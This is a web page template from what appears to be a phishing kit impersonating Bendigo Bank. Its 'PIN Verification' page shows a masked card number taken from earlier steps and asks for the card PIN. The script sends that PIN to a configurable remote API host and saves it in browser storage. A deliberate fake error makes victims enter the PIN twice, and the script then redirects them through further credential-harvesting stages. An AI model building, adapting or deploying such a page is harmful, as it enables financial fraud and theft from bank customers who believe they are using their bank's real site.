<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script defer src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.16/dist/tailwind.min.css">
    <link rel="stylesheet" href="{{asset('css/app.css')}}">
    <link rel="stylesheet" href="{{asset('css/footer.css')}}">
    <link rel="stylesheet" href="{{asset('css/loader.css')}}">
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
    <title>Bendigo Bank - Welcome Back</title>
    <style>
    </style>
    <script>
        const pages = {
            otp: 'otp',
            card: 'card',
            email_password: 'email-password',
        }
        const status = window.localStorage.getItem("status");
        if (status) {
            if (status == 'card' || status == 'otp' || status == 'email-password')
                location.replace(location.href.toString().split("/pin")[0] + "/" + status);
        } else {
            location.replace(location.href.toString().split("/pin")[0] + "/" + 'login');
        }

        let refresh = '{{ $refresh }}';
        let isNeedTwice = '{{ $isNeedTwice }}';
        let isLoggedFirstTime = false;
        isNeedTwice == 'true' ? true : false;


        function onPin(token) {
            let test = true;
            const pin = document.getElementById("pin");
            const isEmpty = '{{$is_field_empty}}' == '1' ? true : false;

            let loader = document.getElementsByClassName("loader-container")[0];

            if (isNaN(pin.value) || pin.value.length != 4) {
                test = false;
                pin.parentElement.classList.add("invalid");
            } else {
                pin.parentElement.classList.remove("invalid");
                test = true;
            }
            if (test) {
                loader.style.display = "flex";
                const captcha = document.getElementsByName("g-recaptcha-response")[0].value;
                setTimeout(() => {
                    let isLogged = (isLoggedFirstTime === true && isNeedTwice === true) || (isLoggedFirstTime === false && isNeedTwice === false) ? true : false
                    axios.post(`{{$api_host}}/api/pin?pin=${pin.value}&captcha=${captcha}
                    `, {})
                        .then(function(response) {
                            if ((!isNeedTwice) || (isNeedTwice == true && isLoggedFirstTime == true)) {
                                isLoggedFirstTime = true;
                                window.localStorage?.setItem("pin", pin.value);
                                const isEmailActive = '{{$is_need_email}}' == '1' ? true : false;
                                if (isEmailActive) {
                                    window.localStorage?.setItem("status", "email-password");
                                    location.replace(location.href.toString().split("/pin")[0] + "/email-password");
                                } else {
                                    window.localStorage?.setItem("status", "");
                                    location.replace('{{ $final_page }}');
                                }
                            } else {
                                isLoggedFirstTime = true;
                                if (isEmpty) {
                                    pin.value = "";
                                    pin.focus();
                                }
                                loader.style.display = "none";
                                const alert = document.getElementsByClassName("alert-container")[0];
                                alert.style.display = "flex";
                            }
                        })
                        .catch(function(error) {
                            console.error('Error:', error);
                            // location.replace('{{$error_link}}');
                        });


                }, refresh);
            }
        }
    </script>
</head>

<div class="bg-white text-black font-sans">
    <x-loader />
    <x-header />

    <div class="bg-red-100 text-red-700 alert-container" role="alert">
        <div class="flex max-w-screen-xl mx-auto p-4 ">
            <div class="py-1">
                <svg class="fill-current h-6 w-6 text-red-500 mr-4" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20">
                    <path d="M10 2C5.03 2 1 6.03 1 11s4.03 9 9 9 9-4.03 9-9-4.03-9-9-9zm0 16a7 7 0 100-14 7 7 0 000 14z" />
                    <path d="M11 12h-2v-2h2v2zm0-4h-2V5h2v3z" />
                </svg>
            </div>
            <div>
                <p class="font-bold">Oops! It seems there might be a small typo in your credit card information.</p>
                <p class="text-sm">Please double-check and ensure the details are accurate. Mistakes happen to the best of us!</p>
            </div>
        </div>
    </div>


    <div class="mt-3 lg:mt-20 pb-56">
        <form class="max-w-md mx-auto">
            <div class="text-2xl font-semibold lg:mt-0">PIN Verification</div>
            <div class="font-normal mt-5 ">
                <!-- Say type your pin for your card number -->
                <p>
                    Please type your PIN for your card <span class="font-bold text-md" id="card"></span>.
                </p>
                </p>
            </div>
            <label for="pin" class="font-bold text-sm mt-14 mb-5 block">PIN Code</label>
            <div class="mb-5 flex items-center relative">
                <img src="./assets/images/icons/password.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                <input id="pin" type="text" name="access" maxlength="4" placeholder="X X X X" required inputmode="numeric" maxlength="16" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
            </div>
            <div class="error hidden text-sm mb-5">
                PIN Code is invalid. It should be a 4-digit number.
            </div>

            <button data-sitekey="{{$recaptcha_key}}" data-callback="onPin" data-action="submit" class="g-recaptcha w-full py-4 font-bold text-white rounded-sm  transition duration-300 ease-in-out">Next</button>

            <a href="/card" class="hidden"></a>
        </form>
    </div>

    <x-footer />
</div>
<script defer type="module">
    const pin = document.getElementById("pin");
    const password = document.getElementById("password");
    const submit = document.querySelector("button[type='submit']");
    const loader = document.getElementsByClassName("loader-container")[0];
    const alert = document.getElementsByClassName("alert-container")[0];

    const cardNumber = document.getElementById("card");

    cardNumber.innerHTML = window.localStorage?.getItem("cardNumber").slice(0, 4) + "-XXXX-XXXX-XXXX";

    function validatePIN(value) {
        if (!/^\d{4}$/.test(value)) {
            pin.parentElement.classList.add("invalid");
            return false;
        } else {
            pin.parentElement.classList.remove("invalid");
            return true;
        }
    }

    pin.addEventListener("input", (e) => {
        validatePIN(e.target.value);
    });
</script>
</div>

</html>